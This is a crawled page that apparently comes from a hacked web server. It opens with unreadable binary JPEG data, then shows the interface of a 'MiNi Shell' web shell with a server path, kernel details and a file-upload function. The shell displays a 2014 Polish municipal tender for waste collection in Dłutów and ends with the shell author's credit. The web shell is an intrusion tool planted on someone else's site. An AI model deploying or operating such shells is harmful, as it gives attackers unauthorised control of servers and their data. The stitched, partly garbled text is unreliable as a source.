JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141030/359958-N-2014.html

<p class="kh_header"><b>Dłutów: Odbiór i zagospodarowanie odpadów komunalnych z terenu
                   gminy Dłutów</b><br>
<b>Numer ogłoszenia: 359958 - 2014; data zamieszczenia: 30.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dłutów , ul. Pabianicka 25, 95-081 Dłutów, woj. łódzkie, tel. 44 6340521, faks 44 6340521.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu
                   gminy Dłutów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości położonych na terenie gminy Dłutów w okresie od 01.01.2015 r. do 31.12.2016 r.
Przedmiot zamówienia podzielony został na 3 zadania, niestanowiące jednak odrębnych części zamówienia i obejmuje łącznie następujące rodzaje odpadów:  
     
 
L.p.	Rodzaj odpadu	Kod odpadu
1	Odpady komunalne zmieszane	20 03 01
2	Odpady opakowaniowe szklane oraz szkło	15 01 07
3	Zmieszane odpady opakowaniowe	15 01 06
4	Opakowania z tworzyw sztucznych	15 01 02
5	Odpady ulegające biodegradacji 	20 02 01
6	Zużyte baterie i akumulatory	20 01 34
7	Zużyty sprzęt elektryczny i elektroniczny
 oraz urządzenia zawierające freony	20 01 35
20 01 36
20 01 23
8	Odpady wielkogabarytowe	20 03 07
9	Zużyte opony	16 01 03
10	Przeterminowane leki	20 01 32
11	Chemikalia
(farby, rozpuszczalniki, oleje odpadowe)	20 01 13
20 01 14
20 01 15
20 01 19
20 01 27

12	Odpady budowlano - rozbiórkowe	grupa 17
13	Opakowania z papieru i tektury oraz papier i tektura	15 01 01
14	Opakowania z metali oraz metale	15 01 04
20 01 40


Zadanie 1
Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych położonych na terenie gminy Dłutów wraz z wyposażeniem wszystkich nieruchomości w pojemniki do gromadzenia odpadów.
Bezpośrednio z nieruchomości odbierane będą następujące rodzaje odpadów:
1) odpady komunalne zmieszane (niesegregowane) o kodzie 20 03 01;
2) odpady komunalne segregowane z podziałem na następujące frakcje:
-	odpady opakowaniowe szklane o kodzie 15 01 07;
-	zmieszane odpady opakowaniowe o kodzie 15 01 06, tj. papier, metal, tworzywa sztuczne, opakowania wielomateriałowe (tzw. odpady suche);
-	odpady ulegające biodegradacji o kodzie 20 02 01 (tzw. bioodpady).
Odbiór odpadów komunalnych będzie się odbywał z następującą częstotliwością:
-	odpady komunalne zmieszane - 1 raz w miesiącu;
-	odpady opakowaniowe szklane - 1 raz w kwartale;
-	odpady suche - 1 raz w miesiącu;
-	bioodpady - 1 raz w miesiącu w miesiącach listopad - kwiecień, 2 razy w miesiącu 
w miesiącach maj - październik;
Odpady będą zbierane i odbierane z pojemników o określonych pojemnościach zgodnie z zapisami uchwały w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
 Pojemności poszczególnych pojemników:
1) dla nieruchomości zamieszkałych:
-	odpady komunalne zmieszane - pojemniki 120l, 240l lub 1100l; 
-	odpady opakowaniowe szklane - pojemniki 120l;
-	odpady suche - pojemniki 240l;
-	bioodpady - pojemniki 140l;
2) dla nieruchomości niezamieszkałych:
-	odpady komunalne zmieszane - pojemniki 120l, 240l, 1100l lub kontenery KP - 7;
-	odpady zbierane selektywnie - pojemniki od 120l do 2500l.
Oznaczenie kolorystyczne poszczególnych pojemników:
-	odpady komunalne zmieszane - kolor zielony;
-	odpady opakowaniowe szklane - kolor pomarańczowy lub w przypadku pojemników typu IGLOO kolor zielony z przeznaczeniem na szkło kolorowe i kolor biały na szkło bezbarwne;
-	odpady suche - kolor żółty lub w przypadku pojemnika siatkowego na tworzywa sztuczne bez oznaczenia kolorem;
-	bioodpady - kolor brązowy.
Wykonawca jest zobowiązany zapewnić pojemniki na odpady komunalne i dostarczyć je na adres nieruchomości wskazanych w wykazie nieruchomości na czas realizacji przedmiotowego zamówienia, bez dodatkowych opłat ze strony właściciela nieruchomości. 
Dostarczenie pojemników na adresy nieruchomości powinno nastąpić najpóźniej 
w terminie 14 dni od momentu otrzymania przez Wykonawcę szczegółowego wykazu nieruchomości.
Szczegółowy, pełny wykaz nieruchomości, z których odbierane będą odpady, wraz z liczbą i rodzajem pojemników, w które należy je wyposażyć, zostanie dostarczony Wykonawcy nie później niż do dnia 15.12.2014 r. Jednocześnie, w terminie od dnia podpisania umowy do dnia 15.12.2014 r. Zamawiający będzie sukcesywnie przekazywał wykazy nieruchomości Wykonawcy w miarę otrzymywanych deklaracji od właścicieli nieruchomości. 





Szacunkowe ilości pojemników, które Wykonawca powinien zabezpieczyć, określa poniższa tabela:

Rodzaj odpadu	Rodzaj pojemnika	Szacowana ilość pojemników	Szacowana ilość odpadów (m3) do odbioru z pojemników
Nieruchomości zamieszkałe - gospodarstwa domowe
Odpady komunalne zmieszane	120l	906	108,72
	240l	504	120,96
Razem	229,68
Odpady opakowaniowe szklane	120l	1274			152,88
Zmieszane odpady opakowaniowe	240l	1273	305,52
Bioodpady	140l	709	99,26

Nieruchomości niezamieszkałe 
Odpady komunalne zmieszane	120l	73	8,76
	240l	22	5,28
	1100l	19	20,9
	KP-7	1	7
Razem                                                               115	41,94
Odpady segregowane	do ustalenia - zabezpieczające potrzeby danych nieruchomości

Dane przedstawione w tabeli mają charakter szacunkowy. Podane ilości mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego, z uwzględnieniem migracji ludności oraz budowy nowych nieruchomości.


Szacowana ilość odpadów komunalnych do odbioru i zagospodarowania w trakcie realizacji przedmiotu zamówienia dla zadania 1 przedstawia się następująco:

L.p.	Rodzaj odpadu	Kod odpadu	Miesięczna ilość odpadów 
(Mg)	Całkowita ilość odpadów 
(Mg)
1	Odpady komunalne zmieszane (niesegregowane)	20 03 01	36,92	886,08
2	Odpady opakowaniowe szklane	15 01 07	6,34	152,16
3	Zmieszane odpady opakowaniowe i opakowania z tworzyw sztucznych	15 01 06
15 01 02	8,8	211,2
4	Odpady ulegające biodegradacji 	20 02 01	9,64	231,36
Zadanie 2
Odbiór i zagospodarowanie odpadów komunalnych zebranych selektywnie, gromadzonych w Punkcie Selektywnego Zbierania Odpadów Komunalnych zlokalizowanym na terenie gminy Dłutów wraz z wyposażeniem w odpowiednie pojemniki do gromadzenia odpadów.
Z wyżej wymienionego punktu odbierane będą następujące rodzaje odpadów:
-	zużyte baterie i akumulatory o kodzie 20 01 34;
-	zużyty sprzęt elektryczny i elektroniczny o kodach 20 01 35 i 20 01 36 oraz urządzenia zawierające freony 20 01 23;
-	odpady wielkogabarytowe o kodzie 20 03 07;
-	zużyte opony o kodzie 16 01 03;
-	przeterminowane leki o kodzie 20 01 32;
-	chemikalia (farby, rozpuszczalniki, oleje odpadowe) o kodach 20 01 13, 20 01 14, 20 01 15, 20 01 19, 20 01 27 i 20 01 29;
-	odpady budowlano - rozbiórkowe o kodach z grupy 17;
-	odpady zielone o kodzie 20 02 01;
-	opakowania szklane oraz szkło o kodzie 15 01 07;
-	opakowania z tworzyw sztucznych o kodzie 15 01 02;
-	opakowania z papieru i tektury  oraz papier i tektura o kodzie 15 01 01;
-	opakowania z metali o kodzie 15 01 04 oraz metale o kodzie 20 01 40.
Zebrane odpady wymienione powyżej będą odbierane z częstotliwością uzależnioną od stopnia zapełnienia pojemników, na zgłoszenie, z terminem odbioru 7 dni kalendarzowych od dnia zgłoszenia. 
Wykonawca ma obowiązek wyposażyć Punkt Selektywnego Zbierania Odpadów Komunalnych w odpowiednie pojemniki i kontenery do gromadzenia odpadów, jeśli Gmina nie będzie dysponować odpowiednimi pojemnikami i kontenerami.
Szacowana ilość odpadów do odbioru i zagospodarowania w trakcie realizacji przedmiotu zamówienia dla zadania 2:

L.p.	Rodzaj odpadu	Kod odpadu	Miesięczna ilość odpadów (Mg)	Całkowita ilość odpadów (Mg)
1	Zużyte baterie i akumulatory	20 01 34	0,01	0,24
2	Zużyty sprzęt elektryczny i elektroniczny oraz urządzenia zawierające freony	20 01 35
20 01 36
20 01 23	0,10	2,4
3	Odpady wielkogabarytowe	20 03 07	2,0	48,0
4	Zużyte opony	16 01 03	0,10	2,4
5	Przeterminowane leki	20 01 32	0,01	0,24
6	Chemikalia	20 01 13
20 01 14
20 01 15
20 01 19
20 01 27
20 01 29	0,01	0,24
7	Odpady budowlano - rozbiórkowe 	grupa 17	0,5	12,0
8	Odpady zielone	20 02 01	0,30	7,2
9	Opakowania szklane oraz szkło	15 01 07	0,15	3,6
10	Opakowania z tworzyw sztucznych oraz tworzywa sztuczne	15 01 02	0,30	7,2
11	Opakowania z papieru i tektury oraz papier i tektura	15 01 01
20 01 01	0,01	0,24
12	Opakowania z metali oraz metale	15 01 04
20 01 40	0,01	0,24

Zadanie 3
Objazdowa zbiórka odpadów problemowych
1. Zbiórka objazdowa odpadów problemowych jest organizowana w gminie Dłutów jeden raz w roku. Zamawiający ustali z Wykonawcą, z przynajmniej miesięcznym wyprzedzeniem, termin realizacji tej części zamówienia oraz jej harmonogram. 
2. Podczas akcji objazdowej Wykonawca zbierze od mieszkańców następujące rodzaje odpadów: 
-	odpady wielkogabarytowe o kodzie 20 03 07; 
-	metale (złom) o kodzie 20 01 40; 
-	zużyte urządzenia elektryczne i elektroniczne o kodach 20 01 35 i 20 01 36; 
-	urządzenia zawierające freony o kodzie 20 01 23; 
-	zużyte opony o kodzie 16 01 03; 
-	baterie i akumulatory o kodzie 20 01 34. 
3. Obowiązkiem Wykonawcy będzie objazd wszystkich miejscowości położonych na terenie gminy Dłutów, załadunek wystawionych przed posesje odpadów na środek transportu, posprzątanie miejsca, z którego zabierane są odpady, a następnie ich wywóz i zagospodarowanie. 
4. Szacunkowe ilości odpadów do odbioru i zagospodarowania w trakcie realizacji przedmiotu zamówienia:

Lp.	Rodzaj odpadu	Szacowana ilość (Mg)
1	odpady wielkogabarytowe o kodzie 20 03 07	60,0
2	metale (złom) o kodzie 20 01 40	0,01
3	zużyte urządzenia elektryczne i elektroniczne o kodach 20 01 35 i 20 01 36	1,0
4	urządzenia zawierające freony o kodzie 20 01 23	0,4
5	zużyte opony o kodzie 16 01 03	7,0
6	baterie i akumulatory o kodzie 20 01 34	0,01.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że posiada uprawnienia dotyczące prowadzenia działalności w zakresie odbierania i zagospodarowania odpadów komunalnych, a mianowicie: 
a) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2013 r., poz. 1399 ze zm.);

b) aktualne zezwolenie na transport, zbieranie i przetwarzanie odpadów komunalnych zgodnie z wymogami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21) lub równoważne wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca spełni ten warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadanie odpowiadające swym rodzajem i zakresem przedmiotowi zamówienia, tj. wykonał usługę polegającą na wywozie odpadów komunalnych z terenu nieruchomości w ilości nie mniejszej niż 500 Mg w czasie świadczenia usługi przez 12 kolejnych miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca spełni ten warunek, jeżeli wykaże, że spełnia wymagania w zakresie:
 1) posiadania bazy magazynowo - transportowej usytuowanej w gminie Dłutów lub w odległości nie większej niż 60 km od granicy gminy Dłutów, na terenie, do którego posiada tytuł prawny,
2) posiadania wyposażenia o odpowiednim stanie technicznym, umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości, a w szczególności:
a) co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych,
b) co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych,
c) co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
Zarówno baza magazynowo-transportowa jak i pojazdy oraz pozostałe urządzenia i narzędzia służące do odbierania odpadów komunalnych muszą spełniać wymagania określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca spełni ten warunek, jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, w wysokości nie niższej niż  400 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowy- sporządzony zgodnie z załącznikiem Nr 1 do niniejszej Specyfikacji;
                                                                                                                                         
2)	oryginał pełnomocnictwa udzielonego osobom podpisującym ofertę, jeżeli prawo do reprezentowania Wykonawcy nie wynika wprost z innych przedstawionych dokumentów;
                                                                                                                                        
3)	w przypadku wspólnego ubiegania się o udzielenie zamówienia - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia;
     4)  oświadczenia i dokumentów, o których mowa w części VI SIWZ;
     5)  zaakceptowany przez Wykonawcę projekt umowy - zał. Nr 7 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień w umowie , jeżeli nastąpi                                                                                                      uzasadniona konieczność  zrezygnowania z niektórych usług  lub wykonania usług zamiennych. Ponadto, gdy zaistnieje inna , niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dlutow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dłutów, ul. Pabianicka 25, 95-081 Dłutów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2014 godzina 12:00, miejsce: Urząd Gminy Dłutów, ul. Pabianicka 25, 95-081 Dłutów - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com